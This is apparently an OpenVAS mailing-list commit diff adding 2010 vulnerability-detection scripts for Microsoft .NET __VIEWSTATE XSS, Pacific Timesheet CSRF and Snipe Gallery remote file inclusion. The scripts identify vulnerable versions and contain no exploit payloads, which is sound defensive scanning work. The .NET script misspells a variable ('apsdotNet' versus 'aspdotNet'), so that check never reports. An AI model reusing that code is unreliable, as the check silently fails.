+ attacks against the form control via the __VIEWSTATE parameter.
+
+ Affected Software/OS:
+ Microsoft .NET version prior to 1.1
+
+ Fix: Upgrade to Microsoft .NET 1.1 or later,
+ For updates refer, http://www.microsoft.com/downloads/details.aspx?displaylang=en
+
+ References:
+ https://www.trustwave.com/spiderlabs/advisories/TWSL2010-001.txt
+ http://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf ";
+
+ script_description(desc);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_summary("Check the version of Microsoft .NET");
+ script_category(ACT_GATHER_INFO);
+ script_family("Windows");
+ script_dependencies("remote-detect-MSdotNET-version.nasl");
+ script_require_ports("Services/www");
+ script_require_keys("dotNET/install", "aspNET/installed", "dotNet/version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+dotNet = get_kb_item("dotNET/install");
+if(!dotNet){
+ exit(0);
+}
+
+apsdotNet = get_kb_item("aspNET/installed");
+if(!aspdotNet){
+ exit(0);
+}
+
+dotNet = get_kb_item("dotNet/version");
+if(!dotNet){
+ exit(0);
+}
+
+## Check for Microsoft .NET version less than 1.1
+if(version_is_less(version:dotNet, test_version:"1.1")){
+ security_warning(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_ms_dotnet_xss_vuln.nasl
___________________________________________________________________
Name: svn:executable
+ *
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_pacific_timesheet_csrf_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_pacific_timesheet_csrf_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_pacific_timesheet_csrf_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_pacific_timesheet_csrf_vuln.nasl 9340 2010-06-02 18:24:29Z june $
+#
+# Pacific Timesheet Cross-Site Request Forgery Vulnerability
+#
+# Authors:
+# Veerendra G.G <veerendragg at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(800181);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2111");
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("Pacific Timesheet Cross-Site Request Forgery Vulnerability");
+ desc = "
+ Overview: This host is running Pacific Timesheet and is prone to cross-site
+ request forgery vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to improper validation of user-supplied input.
+ A remote attacker could exploit this vulnerability to perform cross-site
+ request forgery by tricking a logged in administrator into visiting a
+ malicious web site or link to perform unauthorized actions.
+
+ Impact:
+ Successful exploitation will let the attackers to perform unauthorized
+ actions.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Pacific Timesheet version 6.74 build 363.
+
+ Fix: No solution or patch is available as on 7th June, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.pacifictimesheet.com/
+
+ References:
+ http://secunia.com/advisories/39951
+ http://xforce.iss.net/xforce/xfdb/58934
+ http://cross-site-scripting.blogspot.com/2010/05/pacific-timesheet-674-cross-site.html
+ ";
+
+ script_description(desc);
+ script_summary("Check for the version of Pacific Timesheet");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_family("Web application abuses");
+ script_dependencies("gb_pacific_timesheet_detect.nasl");
+ script_require_ports("Services/www", 80, 8080);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+pacificTSPort = get_http_port(default:80);
+if(!pacificTSPort){
+ exit(0);
+}
+
+## Get Pacific Timesheet from KB
+pacificTSVer = get_kb_item("www/" + pacificTSPort + "/pacificTimeSheet/Ver");
+pacificTSVer = eregmatch(pattern:"^(.+) under (/.*)$", string:pacificTSVer);
+
+if(pacificTSVer[1] != NULL)
+{
+ ## Check for version 6.74 build 363.
+ if(version_is_equal(version:pacificTSVer[1], test_version:"6.74.363")) {
+ security_warning(pacificTSPort);
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/gb_pacific_timesheet_csrf_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_pacific_timesheet_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_pacific_timesheet_detect.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_pacific_timesheet_detect.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,88 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_pacific_timesheet_detect.nasl 9340 2010-06-04 16:50:35Z June $
+#
+# Pacific Timesheet Version Detection
+#
+# Authors:
+# Veerendra GG <veerendragg at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(800180);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"None");
+ script_name("Pacific Timesheet Version Detection");
+ desc = "
+ Overview : This script is detects the installed version of Pacific Timesheet
+ and sets the result in KB.
+ ";
+
+ script_description(desc);
+ script_summary("Set version of Pacific Timesheet in KB");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+ script_family("Service detection");
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/www", 80, 8080);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get Pacific Timesheet port
+pacificTSPort = get_http_port(default:80);
+if(!pacificTSPort){
+ pacificTSPort = 80;
+}
+
+## Check Port status
+if(!get_port_state(pacificTSPort)){
+ exit(0);
+}
+
+foreach path (make_list("/", "/timesheet", cgi_dirs()))
+{
+ ## Send the request and Recieve the response
+ sndReq = http_get(item: path + "/about-show.do", port:pacificTSPort);
+ rcvRes = http_send_recv(port:pacificTSPort, data:sndReq);
+
+ ## Confirm application is Pacific Timesheet
+ if(">About Pacific Timesheet<" >< rcvRes)
+ {
+ ## Get Pacific Timesheet Version
+ pacificTSVer = eregmatch(pattern:">Version ([0-9.]+) [Bb][Uu][Ii][Ll][Dd]"+
+ " ([0-9]+)</", string:rcvRes);
+
+ if(pacificTSVer[1] != NULL && pacificTSVer[2] != NULL)
+ {
+ pacificTSVer = pacificTSVer[1] + "." + pacificTSVer[2];
+ set_kb_item(name:"www/" + pacificTSPort + "/pacificTimeSheet/Ver",
+ value:pacificTSVer + " under " + path);
+ security_note(data:"Pacific Timesheet version " + pacificTSVer +
+ " running at location " + path +
+ " was detected on the host", port:pacificTSPort);
+
+ exit(0);
+ }
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/gb_pacific_timesheet_detect.nasl
___________________________________________________________________
Name: svn:executable
+ *
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_snipegallery_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_snipegallery_detect.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_snipegallery_detect.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,75 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_snipegallery_detect.nasl 9371 2010-06-04 11:11:11Z june $
+#
+# Snipe Gallery Version Detection
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801217);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"None");
+ script_name("Snipe Gallery Version Detection");
+ desc = "
+ Overview: This script finds the running Snipe Gallery version and saves
+ the result in KB.";
+
+ script_description(desc);
+ script_summary("Set the version of Snipe Gallery in KB");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_family("Service detection");
+ script_dependencies("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get http port
+port = get_http_port(default:80);
+if(!port){
+ exit(0);
+}
+
+foreach dir (make_list("/", "/snipegallery", cgi_dirs()))
+{
+ ## Send and Recieve the response
+ req = http_get(item:string(dir,"/index.php"), port:port);
+ res = http_keepalive_send_recv(port:port, data:req);
+
+ ## Confirm the application and Get version
+ ver = eregmatch(pattern:'>Snipe Gallery v.([0-9].[0-9.]+) +- +Galleries',
+ string:res);
+ if(ver[1])
+ {
+ ## Set Snipe Gallery Version in KB
+ set_kb_item(name:"www/" + port + "/snipegallery", value:ver[1] +
+ " under " + dir);
+ security_note(data:"Snipe Gallery version " + ver[1] +
+ " running at location " + dir +
+ " was detected on the host", port:port);
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/gb_snipegallery_detect.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_snipegallery_remote_file_include_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_snipegallery_remote_file_include_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_snipegallery_remote_file_include_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,97 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_snipegallery_remote_file_include_vuln.nasl 9371 2010-06-04 11:11:11Z jun $
+#
+# Snipe Gallery 'cfg_admin_path' Multiple Remote File Include Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801218);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2126");
+ script_bugtraq_id(40279);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("Snipe Gallery 'cfg_admin_path' Multiple Remote File Include Vulnerabilities");
+ desc = "
+ Overview: The host is running Snipe Gallery and is prone to multiple remote
+ file include vulnerabilities.
+
+ Vulnerability Insight:
+ The flaw is caused by improper validation of user-supplied input via the
+ 'cfg_admin_path' parameter to index.php, view.php, image.php, search.php,
+ admin/index.php, admin/gallery/index.php, admin/gallery/view.php,
+ admin/gallery/gallery.php, admin/gallery/image.php,and admin/gallery/crop.php
+ that allow the attackers to execute arbitrary PHP code on the web server.
+
+ Impact:
+ Successful exploitation will let the attacker to execute arbitrary PHP code
+ in the context of an affected site.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Snipe Gallery Version 3.1.4 and 3.1.5
+
+ Fix: No solution or patch is available as on 4th June, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.snipegallery.com/
+
+ References:
+ http://xforce.iss.net/xforce/xfdb/58806
+ http://packetstormsecurity.org/1004-exploits/snipegallery-rfi.txt
+ http://eidelweiss-advisories.blogspot.com/2010/04/snipegallery-315-multiple-remote-file.html
+ ";
+
+ script_description(desc);
+ script_summary("Check for the version of Snipe Gallery");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+ script_family("Web application abuses");
+ script_dependencies("gb_snipegallery_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+ exit(0);
+}
+
+## Get version from KB
+ver = get_kb_item("www/" + port + "/snipegallery");
+snipeVer = eregmatch(pattern:"^(.+) under (/.*)$", string:ver);
+
+if(snipeVer[1])
+{
+ ## Check for Snipe Gallery Version 3.1.4 and 3.1.5
+ if(version_is_equal(version:snipeVer[1], test_version:"3.1.4") ||
+ version_is_equal(version:snipeVer[1], test_version:"3.1.5") ){
+ security_hole(port);
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/gb_snipegallery_remote_file_include_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
More information about the Openvas-commits
mailing list